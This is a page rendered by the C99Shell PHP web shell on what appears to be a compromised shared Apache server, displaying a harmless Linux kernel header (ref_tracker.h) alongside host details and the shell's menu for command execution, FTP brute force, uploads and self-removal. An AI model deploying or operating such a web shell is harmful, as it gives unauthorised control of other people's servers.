!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/src/linux-headers-6.6.116-grsec-jammy-dirty/include/linux/   drwxr-xr-x
Free 687.64 GB of 879.6 GB (78.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ref_tracker.h (2.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// SPDX-License-Identifier: GPL-2.0-or-later
#ifndef _LINUX_REF_TRACKER_H
#define _LINUX_REF_TRACKER_H
#include <linux/refcount.h>
#include <linux/types.h>
#include <linux/spinlock.h>
#include <linux/stackdepot.h>

struct ref_tracker;

struct ref_tracker_dir {
#ifdef CONFIG_REF_TRACKER
    spinlock_t        lock;
    unsigned int        quarantine_avail;
    refcount_t        untracked;
    refcount_t        no_tracker;
    bool            dead;
    struct list_head    list; /* List of active trackers */
    struct list_head    quarantine; /* List of dead trackers */
    char            name[32];
#endif
};

#ifdef CONFIG_REF_TRACKER

static inline void ref_tracker_dir_init(struct ref_tracker_dir *dir,
                    unsigned int quarantine_count,
                    const char *name)
{
    INIT_LIST_HEAD(&dir->list);
    INIT_LIST_HEAD(&dir->quarantine);
    spin_lock_init(&dir->lock);
    dir->quarantine_avail = quarantine_count;
    dir->dead = false;
    refcount_set(&dir->untracked, 1);
    refcount_set(&dir->no_tracker, 1);
    strscpy(dir->name, name, sizeof(dir->name));
    stack_depot_init();
}

void ref_tracker_dir_exit(struct ref_tracker_dir *dir);

void ref_tracker_dir_print_locked(struct ref_tracker_dir *dir,
                  unsigned int display_limit);

void ref_tracker_dir_print(struct ref_tracker_dir *dir,
               unsigned int display_limit);

int ref_tracker_dir_snprint(struct ref_tracker_dir *dir, char *buf, size_t size);

int ref_tracker_alloc(struct ref_tracker_dir *dir,
              struct ref_tracker **trackerp, gfp_t gfp);

int ref_tracker_free(struct ref_tracker_dir *dir,
             struct ref_tracker **trackerp);

#else /* CONFIG_REF_TRACKER */

static inline void ref_tracker_dir_init(struct ref_tracker_dir *dir,
                    unsigned int quarantine_count,
                    const char *name)
{
}

static inline void ref_tracker_dir_exit(struct ref_tracker_dir *dir)
{
}

static inline void ref_tracker_dir_print_locked(struct ref_tracker_dir *dir,
                        unsigned int display_limit)
{
}

static inline void ref_tracker_dir_print(struct ref_tracker_dir *dir,
                     unsigned int display_limit)
{
}

static inline int ref_tracker_dir_snprint(struct ref_tracker_dir *dir,
                      char *buf, size_t size)
{
    return 0;
}

static inline int ref_tracker_alloc(struct ref_tracker_dir *dir,
                    struct ref_tracker **trackerp,
                    gfp_t gfp)
{
    return 0;
}

static inline int ref_tracker_free(struct ref_tracker_dir *dir,
                   struct ref_tracker **trackerp)
{
    return 0;
}

#endif

#endif /* _LINUX_REF_TRACKER_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0103 ]--